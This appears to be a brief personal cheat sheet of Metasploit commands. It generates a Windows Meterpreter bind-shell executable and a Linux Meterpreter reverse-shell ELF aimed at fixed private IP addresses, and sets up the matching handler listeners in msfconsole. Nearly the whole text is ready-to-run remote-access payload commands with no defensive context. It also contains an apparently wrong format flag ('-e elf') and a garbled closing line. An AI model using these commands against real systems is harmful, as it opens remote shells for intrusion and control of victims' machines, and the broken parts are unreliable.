**for windows** msfvenom -p windows/meterpreter/bind_tcp LPORT=4477 -f exe -o BIND_TCP.exe msfconsole > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/bind_tcp set lport 4477 set rhost 172.16.60.76 **for linux** msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -e elf -o reverse_tcp.elf msfconsole > use exploit/multi/handler msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp > set lhost 172.16.60.68 > set lport 5560 chmod a+x reverse_tcp.elf hendler = pret ose servon